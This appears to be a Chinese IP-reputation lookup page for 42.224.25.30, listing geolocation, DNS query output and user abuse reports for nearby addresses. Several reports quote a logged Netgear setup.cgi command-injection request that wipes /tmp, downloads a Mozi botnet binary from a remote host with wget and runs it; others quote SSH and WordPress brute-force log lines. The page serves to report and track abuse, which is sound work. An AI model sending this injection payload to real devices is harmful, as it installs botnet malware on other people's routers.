42.224.25.30 - IPInfo

基本信息:

城市(city): Laocheng

省份(region): Henan

国家(country): China

运营商(isp): China Unicom

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

IP	类型	评论内容	时间
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-02 01:42:57
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-01 17:49:36

类型

评论内容

时间

42.224.25.179

attack

42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...

2020-10-02 01:42:57

42.224.25.179

attack

42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...

2020-10-01 17:49:36

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.224.25.30
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7011
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;42.224.25.30.			IN	A

;; AUTHORITY SECTION:
.			196	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021102 1800 900 604800 86400

;; Query time: 64 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Feb 12 11:54:53 CST 2022
;; MSG SIZE  rcvd: 105

HOST信息:

30.25.224.42.in-addr.arpa domain name pointer hn.kd.ny.adsl.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
30.25.224.42.in-addr.arpa	name = hn.kd.ny.adsl.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
200.219.235.34	attackbots	$f2bV_matches \| Triggered by Fail2Ban at Vostok web server	2020-05-14 01:00:09
27.72.101.134	attack	Automatic report - SSH Brute-Force Attack	2020-05-14 01:12:49
185.166.87.198	attack	Hacking Attempt (Website Honeypot)	2020-05-14 01:02:10
14.232.210.84	attackbotsspam	May 13 14:34:47 vmd17057 sshd[25255]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.232.210.84 May 13 14:34:49 vmd17057 sshd[25255]: Failed password for invalid user admin from 14.232.210.84 port 46050 ssh2 ...	2020-05-14 01:31:05
159.192.140.117	attack	Dovecot Invalid User Login Attempt.	2020-05-14 01:04:20
103.89.84.150	attack	May 13 16:42:14 vpn01 sshd[28167]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.89.84.150 May 13 16:42:16 vpn01 sshd[28167]: Failed password for invalid user origin from 103.89.84.150 port 33496 ssh2 ...	2020-05-14 01:23:18
95.31.245.93	attack	WordPress wp-login brute force :: 95.31.245.93 0.116 - [13/May/2020:12:35:21 0000] [censored_1] "POST /wp-login.php HTTP/1.1" 200 1837 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "HTTP/1.1"	2020-05-14 01:05:17
91.134.173.100	attack	May 13 12:27:54 ip-172-31-62-245 sshd\[18045\]: Invalid user cun from 91.134.173.100\ May 13 12:27:56 ip-172-31-62-245 sshd\[18045\]: Failed password for invalid user cun from 91.134.173.100 port 51470 ssh2\ May 13 12:31:23 ip-172-31-62-245 sshd\[18081\]: Invalid user wwwdata from 91.134.173.100\ May 13 12:31:25 ip-172-31-62-245 sshd\[18081\]: Failed password for invalid user wwwdata from 91.134.173.100 port 56834 ssh2\ May 13 12:34:55 ip-172-31-62-245 sshd\[18110\]: Invalid user castorena from 91.134.173.100\	2020-05-14 01:27:00
178.62.36.116	attackbots	May 13 15:36:04 santamaria sshd\[19549\]: Invalid user spark from 178.62.36.116 May 13 15:36:04 santamaria sshd\[19549\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.36.116 May 13 15:36:06 santamaria sshd\[19549\]: Failed password for invalid user spark from 178.62.36.116 port 49304 ssh2 ...	2020-05-14 01:00:52
188.166.232.14	attackbots	May 13 13:52:56 game-panel sshd[22173]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.166.232.14 May 13 13:52:58 game-panel sshd[22173]: Failed password for invalid user deploy from 188.166.232.14 port 57638 ssh2 May 13 14:00:34 game-panel sshd[22484]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.166.232.14	2020-05-14 01:22:10
197.238.61.162	attack	Postfix RBL failed	2020-05-14 01:19:44
106.13.63.215	attackspam	$f2bV_matches	2020-05-14 01:03:57
46.148.192.41	attack	SSH Brute Force	2020-05-14 01:39:14
212.92.105.117	attack	found in my netstat	2020-05-14 01:45:05
64.183.37.139	attackspam	2020-05-13T14:35:12.351629shield sshd\[11706\]: Invalid user tw from 64.183.37.139 port 46080 2020-05-13T14:35:12.356151shield sshd\[11706\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=rrcs-64-183-37-139.west.biz.rr.com 2020-05-13T14:35:14.937872shield sshd\[11706\]: Failed password for invalid user tw from 64.183.37.139 port 46080 ssh2 2020-05-13T14:39:25.882838shield sshd\[12988\]: Invalid user vboxuser from 64.183.37.139 port 53900 2020-05-13T14:39:25.890115shield sshd\[12988\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=rrcs-64-183-37-139.west.biz.rr.com	2020-05-14 01:25:02

最近上报的IP列表

2.101.143.15	42.224.66.219	42.225.210.211	42.226.85.181
42.226.73.36	42.226.82.138	42.227.224.146	42.228.102.73
42.227.210.66	42.228.44.96	42.226.113.67	42.227.208.244
42.228.99.220	42.228.41.46	42.228.216.118	42.229.217.52
42.229.128.40	42.229.254.81	42.229.253.215	42.230.112.252